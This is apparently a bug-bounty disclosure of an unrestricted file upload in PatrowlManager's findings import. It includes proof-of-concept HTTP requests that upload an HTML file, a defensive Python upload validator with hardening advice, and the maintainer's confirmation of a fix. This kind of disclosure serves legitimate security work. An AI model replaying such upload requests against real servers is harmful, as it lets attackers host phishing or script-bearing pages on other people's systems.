Unrestricted Upload of File with Dangerous Type in patrowl/patrowlmanager

Valid

Reported on Dec 11th 2021


Description

Hi there, I would like to report a vulnerability in the way PatrowlManager handles uploaded files. This is in the Finding -> Import feature.

Proof of Concept

  1. Install PatrowlManager on your local system
  2. Go to Finding -> Import and import a file
  3. An import request looks like this:
POST /findings/import HTTP/1.1
Host: localhost:8083
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------29659837897421318982168117420
Content-Length: 886
Origin: http://localhost:8083
Connection: close
Referer: http://localhost:8083/findings/import
Cookie: patrowl-manager-sc=d7q0a2r8b3b3ytmslj252gxt2l3epdmn
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="csrfmiddlewaretoken"

nMMKSdScbbCYF7NK7YyzuaW9diH5PhI24HBlLGDuAGf1VI5RhmDQdnrpiGyaZaG2
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="engine"

html
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="min_level"

info
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="file"; filename="file.json"
Content-Type: text/html

file-content
-----------------------------29659837897421318982168117420--

If you change "engine" in the above request to some other extensions like .html, .py, you can upload any type of file you want. One example of uploading an HTML file for phishing and XSS is

POST /findings/import HTTP/1.1
Host: localhost:8083
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------29659837897421318982168117420
Content-Length: 875
Origin: http://localhost:8083
Connection: close
Referer: http://localhost:8083/findings/import
Cookie: patrowl-manager-sc=d7q0a2r8b3b3ytmslj252gxt2l3epdmn
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="csrfmiddlewaretoken"

nMMKSdScbbCYF7NK7YyzuaW9diH5PhI24HBlLGDuAGf1VI5RhmDQdnrpiGyaZaG2
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="engine"

html
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="min_level"

info
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="file"; filename="patrowl.html"
Content-Type: text/html

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Here</title>
</head>
<body>
    <a href="https://example.com">Click here</a>

</body>
</html>
-----------------------------29659837897421318982168117420--

  4. Go to the folder /media/imports/<owner_id>/ and see that the dangerous HTML file has been uploaded.

Impact

This vulnerability makes it possible to upload a dangerous type of file to the server.
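The root cause in the report is that the import endpoint stores whatever file the client sends under /media/imports/<owner_id>/ with the client-chosen name, so an HTML body with an .html name lands on disk and can be served back as a page. The helper below is an added example of the server-side check a fix would need; it is not PatrowlManager's code, and the engine-to-extension table, the function names and the size limit are constructed assumptions. It allow-lists the extension per engine, sniffs the content instead of trusting Content-Type, rejects path components in the filename, and never reuses the client name on disk.

```python
import json
import os
import re
import uuid

# Constructed engine table (assumption, not PatrowlManager's own list): each
# import engine is allowed exactly the extensions its parser consumes.
ENGINE_FORMATS = {
    "json": {"json"},
    "nessus": {"xml", "nessus"},
}
# Plain base name with one extension; no separators, no leading dot.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.[A-Za-z0-9]+$")


def content_matches(ext, data):
    """Sniff the bytes instead of trusting the declared Content-Type."""
    if ext == "json":
        try:
            json.loads(data.decode("utf-8"))
            return True
        except (UnicodeDecodeError, ValueError):
            return False
    if ext in ("xml", "nessus"):
        return data.lstrip()[:5].lower() == b"<?xml"
    return False


def validate_import(engine, filename, data, max_bytes=10 * 1024 * 1024):
    """Return (True, storage_name) or (False, reason) for an import upload."""
    allowed = ENGINE_FORMATS.get(engine)
    if allowed is None:
        return False, "unknown engine"
    # Reject path components and odd names before looking at the extension.
    base = os.path.basename(filename.replace("\\", "/"))
    if base != filename or not SAFE_NAME.match(base):
        return False, "unsafe filename"
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in allowed:
        return False, "extension .%s not accepted for engine %s" % (ext, engine)
    if len(data) > max_bytes:
        return False, "file too large"
    if not content_matches(ext, data):
        return False, "content does not match declared format"
    # Never reuse the client-supplied name on disk: random name, allowed extension.
    return True, "%s.%s" % (uuid.uuid4().hex, ext)
```

Even with this check, the import directory should not be served as static web content, and anything that must be downloadable should go out with Content-Disposition: attachment and X-Content-Type-Options: nosniff so a stored file is never rendered as a page.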

We are processing your report and will contact the patrowl/patrowlmanager team within 24 hours. 9 months ago
We have contacted a member of the patrowl/patrowlmanager team and are waiting to hear back 9 months ago
patrowl/patrowlmanager maintainer validated this vulnerability 9 months ago
M0rphling has been awarded the disclosure bounty
The fix bounty is now up for grabs
patrowl/patrowlmanager maintainer (Maintainer), 9 months ago:

Hi @M0rphling, thanks for your report! Will fix it ASAP

patrowl/patrowlmanager maintainer confirmed that a fix has been merged on ba276f 9 months ago
The fix bounty has been dropped